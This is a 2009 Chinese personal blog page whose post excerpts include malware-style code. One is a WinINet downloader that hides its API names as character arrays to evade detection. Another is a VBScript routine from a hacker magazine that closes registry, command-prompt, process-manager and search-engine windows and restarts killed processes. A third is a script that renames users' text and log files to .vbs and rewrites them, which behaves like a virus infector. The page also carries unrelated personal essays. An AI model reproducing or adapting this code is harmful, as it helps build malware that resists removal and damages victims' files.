ASM嵌入VC的wininet downloader

作者:wakakala 发布时间:October 31, 2009 分类:VBS / C++

一个很好的用wininet的例子,我从里面学到很多技巧~
自己曾经也写过一个activex启动方式。DLL注入穿墙。WININET下载。字符串随机替换的downloader。感觉比这个写的要完善一点。

都准备出VIP版了,却无奈被可恨的thinkpad变态的重装机制导致上百G的数据全部丢失。

今天再次看到这个,发上来,悼念一下。
#include "windows.h"

//CodyBy:xets007

bool DownLoadFile(char *szUrl,char *szFile);

void main()
{
char szUrl[]="http://127.0.0.1/test.exe";
char szFile[]="d:\\test.exe";
DownLoadFile(szUrl,szFile);
}
bool DownLoadFile(char *szUrl,char *szFile)
{
char szWininet[12]={'w','i','n','i','n','e','t','.','d','l','l','\0'};
HMODULE hWininet=LoadLibrary(szWininet);
if(hWininet==NULL) return false;
char szInterOpenA[]={'I','n','t','e','r','n','e','t','O','p','e','n','A','\0'};
DWORD dwInterOpenA=(DWORD)GetProcAddress(hWininet,szInterOpenA);
char szInterOpenUrlA[]={'I','n','t','e','r','n','e','t','O','p','e','n','U','r','l','A','\0'};
DWORD dwInterOpenUrlA=(DWORD)GetProcAddress(hWininet,szInterOpenUrlA);
char szHttpQueryInfoA[]={'H','t','t','p','Q','u','e','r','y','I','n','f','o','A','\0'};
DWORD dwHttpQueryInfoA=(DWORD)GetProcAddress(hWininet,szHttpQueryInfoA);
char szInternetCloseHandle[]={'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e','\0'};
DWORD dwInternetCloseHandle=(DWORD)GetProcAddress(hWininet,szInternetCloseHandle);
char szInternetReadFile[]={'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e','\0'};
DWORD dwInternetReadFile=(DWORD)GetProcAddress(hWininet,szInternetReadFile);

阅读剩余部分...

VBS玩”进程相互守护”(节选2)

作者:wakakala 发布时间:October 31, 2009 分类:VBS / C++

本文发表在《黑客防线》2009年一期;转载务必注明版权

使用WS关闭指定内容窗口的函数

-----------------------------------------------code by pk --------------------------------------------------------------------------

 

 

Sub killid(winid)

      Set tmpws=CreateObject("wscript.shell")

         If tmpws.AppActivate(winid)=True Then

            tmpws.SendKeys "%{F4}"

          tmpws.SendKeys "Y"

         End If

      Set tmpws=Nothing

End Sub

winids=Array("我的电脑","超级兔子","注册表","控制台","命令提示符","运行","进程","管理",_

"百度","Google","雅虎","搜狗","爱问","中搜","搜索","有道","奇虎","","Live Search","Tom搜索","Search",_

"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","q","r","s","t","u","v","w","x","y","z",_

"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","Q","R","S","T","U","V","W","X","Y","Z",_


 

阅读剩余部分...

VBS玩”进程相互守护”(节选1)

作者:wakakala 发布时间:October 31, 2009 分类:VBS / C++

本文发表在《黑客防线》2009年一期;转载务必注明版权

一个VBS调用WMI监视指定进程删除,并重启的函数

-----------------------------------------------code by pk ------------------------------------------------------

 

Function monps(path_process)

'监视进程的删除

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

'连接本地CIMV2类,并通过getobjcet函数返回一个对象进行引用

Set colMonitoredProcesses = objWMIService. _       

   ExecNotificationQuery("select * from __InstanceOperationEvent " _

       & " Within 1 Where TargetInstance isa 'Win32_Process'")

'通过ExecNotificationQuery方法执行WQL查询语句

'每隔一秒钟轮询win32_process类中任何实例的建立,修改和删除三种内部事件

Do

'循环        

   Set objEvent = colMonitoredProcesses.NextEvent

'相当于中断脚本,直到需要监控的事件产生

       Select Case objEvent.Path_.Class

'objEvent.Path_.Class获取内部事件的种类,是改动,删除还是新建。

  

阅读剩余部分...

后来

作者:wakakala 发布时间:October 28, 2009 分类:闲云/碎语

后来,HanMeimei当然没嫁给LiLei,她离了一次婚,成了一个文风忧郁的女作家,笔名寒寐,足不出户,却在网络上颇受欢迎。
后来,LiLei当然也没娶HanMeimei,成了李老师,他在中学教语文,不过他还是很开朗。
后来,Lucy回国了,现在也没有结婚,但还是善良而且喜欢音乐,她现在是幼儿园的园长,有时也给孩子们上音乐课。
后来,Jim还留在北京,成了道奇汽车公司的经理,他也真的追过HanMeimei,但没有成功,找了一个中国太太,婚后有了两个孩子,发胖了。
后来,Lily成了电台的编辑,也做业务策划,为保持身体,她不吃冰淇淋了。还有很多很多个男朋友。
后来,Kate去了上海,嫁了个在此工作的美国人,上个月的事。
后来,LinTao当了警察,是户籍警,翠微北里。
后来,UncleWang退休了,还是喜欢鼓捣那些稀奇古怪的东西,上过一次电视。
后 来 ,L.G.Alexander教授回英国了,已经从出版公司退休,还在写东西,他每年来两次中国。
现在,Polly还活着,毛掉了一些,每天最大 的 乐 趣 是 与Alexander教授说中文。

VBS调用WMI遍历搜索硬盘文件,并计数

作者:wakakala 发布时间:October 27, 2009 分类:VBS / C++

多年之前写的一个VBS调用WMI来遍历搜索硬盘文件,并计数的函数,今天整理网盘,看到了,发上来。

 

------------ code by fzhang-------------------------------------------------------------------------------------------------------

Function wmisfile(path_sf,justcnt)
 'On Error Resume Next
 StrComputer="."
 Set ObjWMIService=GetObject("winmgmts:\\"&StrComputer&"\root\cimv2")
 Set FileList = objWMIService.ExecQuery _
     ("ASSOCIATORS OF {Win32_Directory.Name='"&path_sf&"'} Where " _
         & "ResultClass = CIM_DataFile")
  For Each objFile In FileList
   fname=lcase(objfile.name)
   ename=lcase(objfile.extension)
   If 1<objfile.filesize And objfile.filesize<=50000 Then
    Select Case ename
     Case "txt","log"
      path_vbs=objfile.drive&objfile.path&objfile.filename&".vbs"
      objfile.rename(objfile.drive&objFile.Path&objfile.filename&".vbs")
      Call changetovbs(path_vbs,path_vbs)
      justcnt=justcnt+1
              Case "vbs"
               If checkversion(fname)=False Then
                   Call changetovbs(fname,fname)
                   justcnt=justcnt+1
      End If
    End Select
   End If
        Next
 Set colSubfolders = objWMIService.ExecQuery _
     ("Associators of {Win32_Directory.Name='"&path_sf&"'} " _
         & "Where AssocClass = Win32_Subdirectory " _
             & "ResultRole = PartComponent")
  For Each objFolder In colSubfolders
      wmisfile objfolder.name,justcnt
  Next
End Function

-----------------------code end----------------------------------------------------------------------------------------------------

又见西单GIRL

作者:wakakala 发布时间:October 25, 2009 分类:闲云/碎语

在别人的BLOG中又一次看到这个视频,

3月的时候听着,10月的时候听着,6个月的时间,却仿佛恍若隔世

阅读剩余部分...

  1. 页码:
    1. 1
    2. 2